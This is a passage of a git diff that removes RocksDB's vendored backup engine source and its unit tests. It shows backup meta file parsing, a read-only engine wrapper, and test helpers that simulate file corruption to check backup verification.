-      return Status::Corruption("In memory metadata insertion error");
-    }
-  } else {
-    if (itr->second->checksum_value != file_info->checksum_value) {
-      return Status::Corruption(
-          "Checksum mismatch for existing backup file. Delete old backups and "
-          "try again.");
-    }
-    ++itr->second->refs;  // increase refcount if already present
-  }
-
-  size_ += file_info->size;
-  files_.push_back(itr->second);
-
-  return Status::OK();
-}
-
-Status BackupEngineImpl::BackupMeta::Delete(bool delete_meta) {
-  Status s;
-  for (const auto& file : files_) {
-    --file->refs;  // decrease refcount
-  }
-  files_.clear();
-  // delete meta file
-  if (delete_meta) {
-    s = env_->FileExists(meta_filename_);
-    if (s.ok()) {
-      s = env_->DeleteFile(meta_filename_);
-    } else if (s.IsNotFound()) {
-      s = Status::OK();  // nothing to delete
-    }
-  }
-  timestamp_ = 0;
-  return s;
-}
-
-Slice kMetaDataPrefix("metadata ");
-
-// each backup meta file is of the format:
-// <timestamp>
-// <seq number>
-// <metadata(literal string)> <metadata> (optional)
-// <number of files>
-// <file1> <crc32(literal string)> <crc32_value>
-// <file2> <crc32(literal string)> <crc32_value>
-// ...
-Status BackupEngineImpl::BackupMeta::LoadFromFile(
-    const std::string& backup_dir,
-    const std::unordered_map<std::string, uint64_t>& abs_path_to_size) {
-  assert(Empty());
-  Status s;
-  unique_ptr<SequentialFile> backup_meta_file;
-  s = env_->NewSequentialFile(meta_filename_, &backup_meta_file, EnvOptions());
-  if (!s.ok()) {
-    return s;
-  }
-
-  unique_ptr<SequentialFileReader> backup_meta_reader(
-      new SequentialFileReader(std::move(backup_meta_file)));
-  unique_ptr<char[]> buf(new char[max_backup_meta_file_size_ + 1]);
-  Slice data;
-  s = backup_meta_reader->Read(max_backup_meta_file_size_, &data, buf.get());
-
-  if (!s.ok() || data.size() == max_backup_meta_file_size_) {
-    return s.ok() ? Status::Corruption("File size too big") : s;
-  }
-  buf[data.size()] = 0;
-
-  uint32_t num_files = 0;
-  char *next;
-  timestamp_ = strtoull(data.data(), &next, 10);
-  data.remove_prefix(next - data.data() + 1); // +1 for '\n'
-  sequence_number_ = strtoull(data.data(), &next, 10);
-  data.remove_prefix(next - data.data() + 1); // +1 for '\n'
-
-  if (data.starts_with(kMetaDataPrefix)) {
-    // app metadata present
-    data.remove_prefix(kMetaDataPrefix.size());
-    Slice hex_encoded_metadata = GetSliceUntil(&data, '\n');
-    bool decode_success = hex_encoded_metadata.DecodeHex(&app_metadata_);
-    if (!decode_success) {
-      return Status::Corruption(
-          "Failed to decode stored hex encoded app metadata");
-    }
-  }
-
-  num_files = static_cast<uint32_t>(strtoul(data.data(), &next, 10));
-  data.remove_prefix(next - data.data() + 1); // +1 for '\n'
-
-  std::vector<std::shared_ptr<FileInfo>> files;
-
-  Slice checksum_prefix("crc32 ");
-
-  for (uint32_t i = 0; s.ok() && i < num_files; ++i) {
-    auto line = GetSliceUntil(&data, '\n');
-    std::string filename = GetSliceUntil(&line, ' ').ToString();
-
-    uint64_t size;
-    const std::shared_ptr<FileInfo> file_info = GetFile(filename);
-    if (file_info) {
-      size = file_info->size;
-    } else {
-      std::string abs_path = backup_dir + "/" + filename;
-      try {
-        size = abs_path_to_size.at(abs_path);
-      } catch (std::out_of_range&) {
-        return Status::Corruption("Size missing for pathname: " + abs_path);
-      }
-    }
-
-    if (line.empty()) {
-      return Status::Corruption("File checksum is missing for " + filename +
-                                " in " + meta_filename_);
-    }
-
-    uint32_t checksum_value = 0;
-    if (line.starts_with(checksum_prefix)) {
-      line.remove_prefix(checksum_prefix.size());
-      checksum_value = static_cast<uint32_t>(
-          strtoul(line.data(), nullptr, 10));
-      if (line != rocksdb::ToString(checksum_value)) {
-        return Status::Corruption("Invalid checksum value for " + filename +
-                                  " in " + meta_filename_);
-      }
-    } else {
-      return Status::Corruption("Unknown checksum type for " + filename +
-                                " in " + meta_filename_);
-    }
-
-    files.emplace_back(new FileInfo(filename, size, checksum_value));
-  }
-
-  if (s.ok() && data.size() > 0) {
-    // file has to be read completely. if not, we count it as corruption
-    s = Status::Corruption("Tailing data in backup meta file in " +
-                           meta_filename_);
-  }
-
-  if (s.ok()) {
-    files_.reserve(files.size());
-    for (const auto& file_info : files) {
-      s = AddFile(file_info);
-      if (!s.ok()) {
-        break;
-      }
-    }
-  }
-
-  return s;
-}
-
-Status BackupEngineImpl::BackupMeta::StoreToFile(bool sync) {
-  Status s;
-  unique_ptr<WritableFile> backup_meta_file;
-  EnvOptions env_options;
-  env_options.use_mmap_writes = false;
-  env_options.use_direct_writes = false;
-  s = env_->NewWritableFile(meta_filename_ + ".tmp", &backup_meta_file,
-                            env_options);
-  if (!s.ok()) {
-    return s;
-  }
-
-  unique_ptr<char[]> buf(new char[max_backup_meta_file_size_]);
-  size_t len = 0, buf_size = max_backup_meta_file_size_;
-  len += snprintf(buf.get(), buf_size, "%" PRId64 "\n", timestamp_);
-  len += snprintf(buf.get() + len, buf_size - len, "%" PRIu64 "\n",
-                  sequence_number_);
-  if (!app_metadata_.empty()) {
-    std::string hex_encoded_metadata =
-        Slice(app_metadata_).ToString(/* hex */ true);
-    if (hex_encoded_metadata.size() + kMetaDataPrefix.size() + 1 >
-        buf_size - len) {
-      return Status::Corruption("Buffer too small to fit backup metadata");
-    }
-    memcpy(buf.get() + len, kMetaDataPrefix.data(), kMetaDataPrefix.size());
-    len += kMetaDataPrefix.size();
-    memcpy(buf.get() + len, hex_encoded_metadata.data(),
-           hex_encoded_metadata.size());
-    len += hex_encoded_metadata.size();
-    buf[len++] = '\n';
-  }
-  len += snprintf(buf.get() + len, buf_size - len, "%" ROCKSDB_PRIszt "\n",
-                  files_.size());
-  for (const auto& file : files_) {
-    // use crc32 for now, switch to something else if needed
-    len += snprintf(buf.get() + len, buf_size - len, "%s crc32 %u\n",
-                    file->filename.c_str(), file->checksum_value);
-  }
-
-  s = backup_meta_file->Append(Slice(buf.get(), len));
-  if (s.ok() && sync) {
-    s = backup_meta_file->Sync();
-  }
-  if (s.ok()) {
-    s = backup_meta_file->Close();
-  }
-  if (s.ok()) {
-    s = env_->RenameFile(meta_filename_ + ".tmp", meta_filename_);
-  }
-  return s;
-}
-
-// -------- BackupEngineReadOnlyImpl ---------
-class BackupEngineReadOnlyImpl : public BackupEngineReadOnly {
- public:
-  BackupEngineReadOnlyImpl(Env* db_env, const BackupableDBOptions& options)
-      : backup_engine_(new BackupEngineImpl(db_env, options, true)) {}
-
-  virtual ~BackupEngineReadOnlyImpl() {}
-
-  // The returned BackupInfos are in chronological order, which means the
-  // latest backup comes last.
-  virtual void GetBackupInfo(std::vector<BackupInfo>* backup_info) override {
-    backup_engine_->GetBackupInfo(backup_info);
-  }
-
-  virtual void GetCorruptedBackups(
-      std::vector<BackupID>* corrupt_backup_ids) override {
-    backup_engine_->GetCorruptedBackups(corrupt_backup_ids);
-  }
-
-  virtual Status RestoreDBFromBackup(
-      BackupID backup_id, const std::string& db_dir, const std::string& wal_dir,
-      const RestoreOptions& restore_options = RestoreOptions()) override {
-    return backup_engine_->RestoreDBFromBackup(backup_id, db_dir, wal_dir,
-                                               restore_options);
-  }
-
-  virtual Status RestoreDBFromLatestBackup(
-      const std::string& db_dir, const std::string& wal_dir,
-      const RestoreOptions& restore_options = RestoreOptions()) override {
-    return backup_engine_->RestoreDBFromLatestBackup(db_dir, wal_dir,
-                                                     restore_options);
-  }
-
-  virtual Status VerifyBackup(BackupID backup_id) override {
-    return backup_engine_->VerifyBackup(backup_id);
-  }
-
-  Status Initialize() { return backup_engine_->Initialize(); }
-
- private:
-  std::unique_ptr<BackupEngineImpl> backup_engine_;
-};
-
-Status BackupEngineReadOnly::Open(Env* env, const BackupableDBOptions& options,
-                                  BackupEngineReadOnly** backup_engine_ptr) {
-  if (options.destroy_old_data) {
-    return Status::InvalidArgument(
-        "Can't destroy old data with ReadOnly BackupEngine");
-  }
-  std::unique_ptr<BackupEngineReadOnlyImpl> backup_engine(
-      new BackupEngineReadOnlyImpl(env, options));
-  auto s = backup_engine->Initialize();
-  if (!s.ok()) {
-    *backup_engine_ptr = nullptr;
-    return s;
-  }
-  *backup_engine_ptr = backup_engine.release();
-  return Status::OK();
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/backupable/backupable_db_test.cc b/thirdparty/rocksdb/utilities/backupable/backupable_db_test.cc
deleted file mode 100644
index be20a8d..0000000
--- a/thirdparty/rocksdb/utilities/backupable/backupable_db_test.cc
+++ /dev/null
@@ -1,1548 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#if !defined(ROCKSDB_LITE) && !defined(OS_WIN)
-
-#include <algorithm>
-#include <string>
-
-#include "db/db_impl.h"
-#include "env/env_chroot.h"
-#include "port/port.h"
-#include "port/stack_trace.h"
-#include "rocksdb/rate_limiter.h"
-#include "rocksdb/transaction_log.h"
-#include "rocksdb/types.h"
-#include "rocksdb/utilities/backupable_db.h"
-#include "rocksdb/utilities/options_util.h"
-#include "util/file_reader_writer.h"
-#include "util/filename.h"
-#include "util/mutexlock.h"
-#include "util/random.h"
-#include "util/stderr_logger.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-namespace {
-
-using std::unique_ptr;
-
-class DummyDB : public StackableDB {
- public:
-  /* implicit */
-  DummyDB(const Options& options, const std::string& dbname)
-     : StackableDB(nullptr), options_(options), dbname_(dbname),
-       deletions_enabled_(true), sequence_number_(0) {}
-
-  virtual SequenceNumber GetLatestSequenceNumber() const override {
-    return ++sequence_number_;
-  }
-
-  virtual const std::string& GetName() const override {
-    return dbname_;
-  }
-
-  virtual Env* GetEnv() const override {
-    return options_.env;
-  }
-
-  using DB::GetOptions;
-  virtual Options GetOptions(ColumnFamilyHandle* column_family) const override {
-    return options_;
-  }
-
-  virtual DBOptions GetDBOptions() const override {
-    return DBOptions(options_);
-  }
-
-  virtual Status EnableFileDeletions(bool force) override {
-    EXPECT_TRUE(!deletions_enabled_);
-    deletions_enabled_ = true;
-    return Status::OK();
-  }
-
-  virtual Status DisableFileDeletions() override {
-    EXPECT_TRUE(deletions_enabled_);
-    deletions_enabled_ = false;
-    return Status::OK();
-  }
-
-  virtual Status GetLiveFiles(std::vector<std::string>& vec, uint64_t* mfs,
-                              bool flush_memtable = true) override {
-    EXPECT_TRUE(!deletions_enabled_);
-    vec = live_files_;
-    *mfs = 100;
-    return Status::OK();
-  }
-
-  virtual ColumnFamilyHandle* DefaultColumnFamily() const override {
-    return nullptr;
-  }
-
-  class DummyLogFile : public LogFile {
-   public:
-    /* implicit */
-     DummyLogFile(const std::string& path, bool alive = true)
-         : path_(path), alive_(alive) {}
-
-    virtual std::string PathName() const override {
-      return path_;
-    }
-
-    virtual uint64_t LogNumber() const override {
-      // what business do you have calling this method?
-      ADD_FAILURE();
-      return 0;
-    }
-
-    virtual WalFileType Type() const override {
-      return alive_ ? kAliveLogFile : kArchivedLogFile;
-    }
-
-    virtual SequenceNumber StartSequence() const override {
-      // this seqnum guarantees the dummy file will be included in the backup
-      // as long as it is alive.
-      return kMaxSequenceNumber;
-    }
-
-    virtual uint64_t SizeFileBytes() const override {
-      return 0;
-    }
-
-   private:
-    std::string path_;
-    bool alive_;
-  }; // DummyLogFile
-
-  virtual Status GetSortedWalFiles(VectorLogPtr& files) override {
-    EXPECT_TRUE(!deletions_enabled_);
-    files.resize(wal_files_.size());
-    for (size_t i = 0; i < files.size(); ++i) {
-      files[i].reset(
-          new DummyLogFile(wal_files_[i].first, wal_files_[i].second));
-    }
-    return Status::OK();
-  }
-
-  // To avoid FlushWAL called on stacked db which is nullptr
-  virtual Status FlushWAL(bool sync) override { return Status::OK(); }
-
-  std::vector<std::string> live_files_;
-  // pair<filename, alive?>
-  std::vector<std::pair<std::string, bool>> wal_files_;
- private:
-  Options options_;
-  std::string dbname_;
-  bool deletions_enabled_;
-  mutable SequenceNumber sequence_number_;
-}; // DummyDB
-
-class TestEnv : public EnvWrapper {
- public:
-  explicit TestEnv(Env* t) : EnvWrapper(t) {}
-
-  class DummySequentialFile : public SequentialFile {
-   public:
-    explicit DummySequentialFile(bool fail_reads)
-        : SequentialFile(), rnd_(5), fail_reads_(fail_reads) {}
-    virtual Status Read(size_t n, Slice* result, char* scratch) override {
-      if (fail_reads_) {
-        return Status::IOError();
-      }
-      size_t read_size = (n > size_left) ? size_left : n;
-      for (size_t i = 0; i < read_size; ++i) {
-        scratch[i] = rnd_.Next() & 255;
-      }
-      *result = Slice(scratch, read_size);
-      size_left -= read_size;
-      return Status::OK();
-    }
-
-    virtual Status Skip(uint64_t n) override {
-      size_left = (n > size_left) ? size_left - n : 0;
-      return Status::OK();
-    }
-   private:
-    size_t size_left = 200;
-    Random rnd_;
-    bool fail_reads_;
-  };
-
-  Status NewSequentialFile(const std::string& f, unique_ptr<SequentialFile>* r,
-                           const EnvOptions& options) override {
-    MutexLock l(&mutex_);
-    if (dummy_sequential_file_) {
-      r->reset(
-          new TestEnv::DummySequentialFile(dummy_sequential_file_fail_reads_));
-      return Status::OK();
-    } else {
-      return EnvWrapper::NewSequentialFile(f, r, options);
-    }
-  }
-
-  Status NewWritableFile(const std::string& f, unique_ptr<WritableFile>* r,
-                         const EnvOptions& options) override {
-    MutexLock l(&mutex_);
-    written_files_.push_back(f);
-    if (limit_written_files_ <= 0) {
-      return Status::NotSupported("Sorry, can't do this");
-    }
-    limit_written_files_--;
-    return EnvWrapper::NewWritableFile(f, r, options);
-  }
-
-  virtual Status DeleteFile(const std::string& fname) override {
-    MutexLock l(&mutex_);
-    if (fail_delete_files_) {
-      return Status::IOError();
-    }
-    EXPECT_GT(limit_delete_files_, 0U);
-    limit_delete_files_--;
-    return EnvWrapper::DeleteFile(fname);
-  }
-
-  virtual Status DeleteDir(const std::string& dirname) override {
-    MutexLock l(&mutex_);
-    if (fail_delete_files_) {
-      return Status::IOError();
-    }
-    return EnvWrapper::DeleteDir(dirname);
-  }
-
-  void AssertWrittenFiles(std::vector<std::string>& should_have_written) {
-    MutexLock l(&mutex_);
-    std::sort(should_have_written.begin(), should_have_written.end());
-    std::sort(written_files_.begin(), written_files_.end());
-
-    ASSERT_EQ(should_have_written, written_files_);
-  }
-
-  void ClearWrittenFiles() {
-    MutexLock l(&mutex_);
-    written_files_.clear();
-  }
-
-  void SetLimitWrittenFiles(uint64_t limit) {
-    MutexLock l(&mutex_);
-    limit_written_files_ = limit;
-  }
-
-  void SetLimitDeleteFiles(uint64_t limit) {
-    MutexLock l(&mutex_);
-    limit_delete_files_ = limit;
-  }
-
-  void SetDeleteFileFailure(bool fail) {
-    MutexLock l(&mutex_);
-    fail_delete_files_ = fail;
-  }
-
-  void SetDummySequentialFile(bool dummy_sequential_file) {
-    MutexLock l(&mutex_);
-    dummy_sequential_file_ = dummy_sequential_file;
-  }
-  void SetDummySequentialFileFailReads(bool dummy_sequential_file_fail_reads) {
-    MutexLock l(&mutex_);
-    dummy_sequential_file_fail_reads_ = dummy_sequential_file_fail_reads;
-  }
-
-  void SetGetChildrenFailure(bool fail) { get_children_failure_ = fail; }
-  Status GetChildren(const std::string& dir,
-                     std::vector<std::string>* r) override {
-    if (get_children_failure_) {
-      return Status::IOError("SimulatedFailure");
-    }
-    return EnvWrapper::GetChildren(dir, r);
-  }
-
-  // Some test cases do not actually create the test files (e.g., see
-  // DummyDB::live_files_) - for those cases, we mock those files' attributes
-  // so CreateNewBackup() can get their attributes.
-  void SetFilenamesForMockedAttrs(const std::vector<std::string>& filenames) {
-    filenames_for_mocked_attrs_ = filenames;
-  }
-  Status GetChildrenFileAttributes(
-      const std::string& dir, std::vector<Env::FileAttributes>* r) override {
-    if (filenames_for_mocked_attrs_.size() > 0) {
-      for (const auto& filename : filenames_for_mocked_attrs_) {
-        r->push_back({dir + filename, 10 /* size_bytes */});
-      }
-      return Status::OK();
-    }
-    return EnvWrapper::GetChildrenFileAttributes(dir, r);
-  }
-  Status GetFileSize(const std::string& path, uint64_t* size_bytes) override {
-    if (filenames_for_mocked_attrs_.size() > 0) {
-      auto fname = path.substr(path.find_last_of('/'));
-      auto filename_iter = std::find(filenames_for_mocked_attrs_.begin(),
-                                     filenames_for_mocked_attrs_.end(), fname);
-      if (filename_iter != filenames_for_mocked_attrs_.end()) {
-        *size_bytes = 10;
-        return Status::OK();
-      }
-      return Status::NotFound(fname);
-    }
-    return EnvWrapper::GetFileSize(path, size_bytes);
-  }
-
-  void SetCreateDirIfMissingFailure(bool fail) {
-    create_dir_if_missing_failure_ = fail;
-  }
-  Status CreateDirIfMissing(const std::string& d) override {
-    if (create_dir_if_missing_failure_) {
-      return Status::IOError("SimulatedFailure");
-    }
-    return EnvWrapper::CreateDirIfMissing(d);
-  }
-
-  void SetNewDirectoryFailure(bool fail) { new_directory_failure_ = fail; }
-  virtual Status NewDirectory(const std::string& name,
-                              unique_ptr<Directory>* result) override {
-    if (new_directory_failure_) {
-      return Status::IOError("SimulatedFailure");
-    }
-    return EnvWrapper::NewDirectory(name, result);
-  }
-
- private:
-  port::Mutex mutex_;
-  bool dummy_sequential_file_ = false;
-  bool dummy_sequential_file_fail_reads_ = false;
-  std::vector<std::string> written_files_;
-  std::vector<std::string> filenames_for_mocked_attrs_;
-  uint64_t limit_written_files_ = 1000000;
-  uint64_t limit_delete_files_ = 1000000;
-  bool fail_delete_files_ = false;
-
-  bool get_children_failure_ = false;
-  bool create_dir_if_missing_failure_ = false;
-  bool new_directory_failure_ = false;
-};  // TestEnv
-
-class FileManager : public EnvWrapper {
- public:
-  explicit FileManager(Env* t) : EnvWrapper(t), rnd_(5) {}
-
-  Status DeleteRandomFileInDir(const std::string& dir) {
-    std::vector<std::string> children;
-    GetChildren(dir, &children);
-    if (children.size() <= 2) { // . and ..
-      return Status::NotFound("");
-    }
-    while (true) {
-      int i = rnd_.Next() % children.size();
-      if (children[i] != "." && children[i] != "..") {
-        return DeleteFile(dir + "/" + children[i]);
-      }
-    }
-    // should never get here
-    assert(false);
-    return Status::NotFound("");
-  }
-
-  Status AppendToRandomFileInDir(const std::string& dir,
-                                 const std::string& data) {
-    std::vector<std::string> children;
-    GetChildren(dir, &children);
-    if (children.size() <= 2) {
-      return Status::NotFound("");
-    }
-    while (true) {
-      int i = rnd_.Next() % children.size();
-      if (children[i] != "." && children[i] != "..") {
-        return WriteToFile(dir + "/" + children[i], data);
-      }
-    }
-    // should never get here
-    assert(false);
-    return Status::NotFound("");
-  }
-
-  Status CorruptFile(const std::string& fname, uint64_t bytes_to_corrupt) {
-    std::string file_contents;
-    Status s = ReadFileToString(this, fname, &file_contents);
-    if (!s.ok()) {
-      return s;
-    }
-    s = DeleteFile(fname);
-    if (!s.ok()) {
-      return s;
-    }
-
-    for (uint64_t i = 0; i < bytes_to_corrupt; ++i) {
-      std::string tmp;
-      test::RandomString(&rnd_, 1, &tmp);
-      file_contents[rnd_.Next() % file_contents.size()] = tmp[0];
-    }
-    return WriteToFile(fname, file_contents);
-  }
-
-  Status CorruptChecksum(const std::string& fname, bool appear_valid) {
-    std::string metadata;
-    Status s = ReadFileToString(this, fname, &metadata);
-    if (!s.ok()) {
-      return s;
-    }
-    s = DeleteFile(fname);
-    if (!s.ok()) {
-      return s;
-    }
-
-    auto pos = metadata.find("private");
-    if (pos == std::string::npos) {
-      return Status::Corruption("private file is expected");
-    }
-    pos = metadata.find(" crc32 ", pos + 6);
-    if (pos == std::string::npos) {
-      return Status::Corruption("checksum not found");
-    }
-
-    if (metadata.size() < pos + 7) {
-      return Status::Corruption("bad CRC32 checksum value");
-    }
-
-    if (appear_valid) {
-      if (metadata[pos + 8] == '\n') {
-        // single digit value, safe to insert one more digit
-        metadata.insert(pos + 8, 1, '0');
-      } else {
-        metadata.erase(pos + 8, 1);
-      }
-    } else {
-      metadata[pos + 7] = 'a';
-    }
-
-    return WriteToFile(fname, metadata);
-  }
-
-  Status WriteToFile(const std::string& fname, const std::string& data) {
-    unique_ptr<WritableFile> file;
-    EnvOptions env_options;
-    env_options.use_mmap_writes = false;
-    Status s = EnvWrapper::NewWritableFile(fname, &file, env_options);
-    if (!s.ok()) {
-      return s;
-    }
-    return file->Append(Slice(data));
-  }
-
- private:
-  Random rnd_;
-}; // FileManager
-
-// utility functions
-static size_t FillDB(DB* db, int from, int to) {
-  size_t bytes_written = 0;
-  for (int i = from; i < to; ++i) {
-    std::string key = "testkey" + ToString(i);
-    std::string value = "testvalue" + ToString(i);
-    bytes_written += key.size() + value.size();
-
-    EXPECT_OK(db->Put(WriteOptions(), Slice(key), Slice(value)));
-  }
-  return bytes_written;
-}
-
-static void AssertExists(DB* db, int from, int to) {
-  for (int i = from; i < to; ++i) {
-    std::string key = "testkey" + ToString(i);
-    std::string value;
-    Status s = db->Get(ReadOptions(), Slice(key), &value);
-    ASSERT_EQ(value, "testvalue" + ToString(i));
-  }
-}
-
-static void AssertEmpty(DB* db, int from, int to) {
-  for (int i = from; i < to; ++i) {
-    std::string key = "testkey" + ToString(i);
-    std::string value = "testvalue" + ToString(i);
-
-    Status s = db->Get(ReadOptions(), Slice(key), &value);
-    ASSERT_TRUE(s.IsNotFound());
-  }
-}
-
-class BackupableDBTest : public testing::Test {
- public:
-  BackupableDBTest() {
-    // set up files
-    std::string db_chroot = test::TmpDir() + "/backupable_db";
-    std::string backup_chroot = test::TmpDir() + "/backupable_db_backup";
-    Env::Default()->CreateDir(db_chroot);
-    Env::Default()->CreateDir(backup_chroot);
-    dbname_ = "/tempdb";
-    backupdir_ = "/tempbk";
-
-    // set up envs
-    db_chroot_env_.reset(NewChrootEnv(Env::Default(), db_chroot));
-    backup_chroot_env_.reset(NewChrootEnv(Env::Default(), backup_chroot));
-    test_db_env_.reset(new TestEnv(db_chroot_env_.get()));
-    test_backup_env_.reset(new TestEnv(backup_chroot_env_.get()));
-    file_manager_.reset(new FileManager(backup_chroot_env_.get()));
-
-    // set up db options
-    options_.create_if_missing = true;
-    options_.paranoid_checks = true;
-    options_.write_buffer_size = 1 << 17; // 128KB
-    options_.env = test_db_env_.get();
-    options_.wal_dir = dbname_;
-
-    // Create logger
-    DBOptions logger_options;
-    logger_options.env = db_chroot_env_.get();
-    CreateLoggerFromOptions(dbname_, logger_options, &logger_);
-
-    // set up backup db options
-    backupable_options_.reset(new BackupableDBOptions(
-        backupdir_, test_backup_env_.get(), true, logger_.get(), true));
-
-    // most tests will use multi-threaded backups
-    backupable_options_->max_background_operations = 7;
-
-    // delete old files in db
-    DestroyDB(dbname_, options_);
-  }
-
-  DB* OpenDB() {
-    DB* db;
-    EXPECT_OK(DB::Open(options_, dbname_, &db));
-    return db;
-  }
-
-  void OpenDBAndBackupEngineShareWithChecksum(
-      bool destroy_old_data = false, bool dummy = false,
-      bool share_table_files = true, bool share_with_checksums = false) {
-    backupable_options_->share_files_with_checksum = share_with_checksums;
-    OpenDBAndBackupEngine(destroy_old_data, dummy, share_with_checksums);
-  }
-
-  void OpenDBAndBackupEngine(bool destroy_old_data = false, bool dummy = false,
-                             bool share_table_files = true) {
-    // reset all the defaults
-    test_backup_env_->SetLimitWrittenFiles(1000000);
-    test_db_env_->SetLimitWrittenFiles(1000000);
-    test_db_env_->SetDummySequentialFile(dummy);
-
-    DB* db;
-    if (dummy) {
-      dummy_db_ = new DummyDB(options_, dbname_);
-      db = dummy_db_;
-    } else {
-      ASSERT_OK(DB::Open(options_, dbname_, &db));
-    }
-    db_.reset(db);
-    backupable_options_->destroy_old_data = destroy_old_data;
-    backupable_options_->share_table_files = share_table_files;
-    BackupEngine* backup_engine;
-    ASSERT_OK(BackupEngine::Open(test_db_env_.get(), *backupable_options_,
-                                 &backup_engine));
-    backup_engine_.reset(backup_engine);
-  }
-
-  void CloseDBAndBackupEngine() {
-    db_.reset();
-    backup_engine_.reset();
-  }
-
-  void OpenBackupEngine() {
-    backupable_options_->destroy_old_data = false;
-    BackupEngine* backup_engine;
-    ASSERT_OK(BackupEngine::Open(test_db_env_.get(), *backupable_options_,
-                                 &backup_engine));
-    backup_engine_.reset(backup_engine);
-  }
-
-  void CloseBackupEngine() { backup_engine_.reset(nullptr); }
-
-  // restores backup backup_id and asserts the existence of
-  // [start_exist, end_exist> and not-existence of
-  // [end_exist, end>
-  //
-  // if backup_id == 0, it means restore from latest
-  // if end == 0, don't check AssertEmpty
-  void AssertBackupConsistency(BackupID backup_id, uint32_t start_exist,
-                               uint32_t end_exist, uint32_t end = 0,
-                               bool keep_log_files = false) {
-    RestoreOptions restore_options(keep_log_files);
-    bool opened_backup_engine = false;
-    if (backup_engine_.get() == nullptr) {
-      opened_backup_engine = true;
-      OpenBackupEngine();
-    }
-    if (backup_id > 0) {
-      ASSERT_OK(backup_engine_->RestoreDBFromBackup(backup_id, dbname_, dbname_,
-                                                    restore_options));
-    } else {
-      ASSERT_OK(backup_engine_->RestoreDBFromLatestBackup(dbname_, dbname_,
-                                                          restore_options));
-    }
-    DB* db = OpenDB();
-    AssertExists(db, start_exist, end_exist);
-    if (end != 0) {
-      AssertEmpty(db, end_exist, end);
-    }
-    delete db;
-    if (opened_backup_engine) {
-      CloseBackupEngine();
-    }
-  }
-
-  void DeleteLogFiles() {
-    std::vector<std::string> delete_logs;
-    db_chroot_env_->GetChildren(dbname_, &delete_logs);
-    for (auto f : delete_logs) {
-      uint64_t number;
-      FileType type;
-      bool ok = ParseFileName(f, &number, &type);
-      if (ok && type == kLogFile) {
-        db_chroot_env_->DeleteFile(dbname_ + "/" + f);
-      }
-    }
-  }
-
-  // files
-  std::string dbname_;
-  std::string backupdir_;
-
-  // logger_ must be above backup_engine_ such that the engine's destructor,
-  // which uses a raw pointer to the logger, executes first.
-  std::shared_ptr<Logger> logger_;
-
-  // envs
-  unique_ptr<Env> db_chroot_env_;
-  unique_ptr<Env> backup_chroot_env_;
-  unique_ptr<TestEnv> test_db_env_;
-  unique_ptr<TestEnv> test_backup_env_;
-  unique_ptr<FileManager> file_manager_;
-
-  // all the dbs!
-  DummyDB* dummy_db_; // BackupableDB owns dummy_db_
-  unique_ptr<DB> db_;
-  unique_ptr<BackupEngine> backup_engine_;
-
-  // options
-  Options options_;
-
- protected:
-  unique_ptr<BackupableDBOptions> backupable_options_;
-}; // BackupableDBTest
-
-void AppendPath(const std::string& path, std::vector<std::string>& v) {
-  for (auto& f : v) {
-    f = path + f;
-  }
-}
-
-class BackupableDBTestWithParam : public BackupableDBTest,
-                                  public testing::WithParamInterface<bool> {
- public:
-  BackupableDBTestWithParam() {
-    backupable_options_->share_files_with_checksum = GetParam();
-  }
-};
-
-// This test verifies that the verifyBackup method correctly identifies
-// invalid backups
-TEST_P(BackupableDBTestWithParam, VerifyBackup) {
-  const int keys_iteration = 5000;
-  Random rnd(6);
-  Status s;
-  OpenDBAndBackupEngine(true);
-  // create five backups
-  for (int i = 0; i < 5; ++i) {
-    FillDB(db_.get(), keys_iteration * i, keys_iteration * (i + 1));
-    ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), true));
-  }
-  CloseDBAndBackupEngine();
-
-  OpenDBAndBackupEngine();
-  // ---------- case 1. - valid backup -----------
-  ASSERT_TRUE(backup_engine_->VerifyBackup(1).ok());
-
-  // ---------- case 2. - delete a file -----------i
-  file_manager_->DeleteRandomFileInDir(backupdir_ + "/private/1");
-  ASSERT_TRUE(backup_engine_->VerifyBackup(1).IsNotFound());
-
-  // ---------- case 3. - corrupt a file -----------
-  std::string append_data = "Corrupting a random file";
-  file_manager_->AppendToRandomFileInDir(backupdir_ + "/private/2",
-                                         append_data);
-  ASSERT_TRUE(backup_engine_->VerifyBackup(2).IsCorruption());
-
-  // ---------- case 4. - invalid backup -----------
-  ASSERT_TRUE(backup_engine_->VerifyBackup(6).IsNotFound());
-  CloseDBAndBackupEngine();
-}
-
-// open DB, write, close DB, backup, restore, repeat
-TEST_P(BackupableDBTestWithParam, OfflineIntegrationTest) {
-  // has to be a big number, so that it triggers the memtable flush
-  const int keys_iteration = 5000;
-  const int max_key = keys_iteration * 4 + 10;
-  // first iter -- flush before backup
-  // second iter -- don't flush before backup
-  for (int iter = 0; iter < 2; ++iter) {
-    // delete old data
-    DestroyDB(dbname_, options_);
-    bool destroy_data = true;
-
-    // every iteration --
-    // 1. insert new data in the DB
-    // 2. backup the DB
-    // 3. destroy the db
-    // 4. restore the db, check everything is still there
-    for (int i = 0; i < 5; ++i) {
-      // in last iteration, put smaller amount of data,
-      int fill_up_to = std::min(keys_iteration * (i + 1), max_key);
-      // ---- insert new data and back up ----
-      OpenDBAndBackupEngine(destroy_data);
-      destroy_data = false;
-      FillDB(db_.get(), keys_iteration * i, fill_up_to);
-      ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), iter == 0));
-      CloseDBAndBackupEngine();
-      DestroyDB(dbname_, options_);
-
-      // ---- make sure it's empty ----
-      DB* db = OpenDB();
-      AssertEmpty(db, 0, fill_up_to);
-      delete db;
-
-      // ---- restore the DB ----
-      OpenBackupEngine();
-      if (i >= 3) {  // test purge old backups
-        // when i == 4, purge to only 1 backup
-        // when i == 3, purge to 2 backups
-        ASSERT_OK(backup_engine_->PurgeOldBackups(5 - i));
-      }
-      // ---- make sure the data is there ---
-      AssertBackupConsistency(0, 0, fill_up_to, max_key);
-      CloseBackupEngine();
-    }
-  }
-}
-
-// open DB, write, backup, write, backup, close, restore
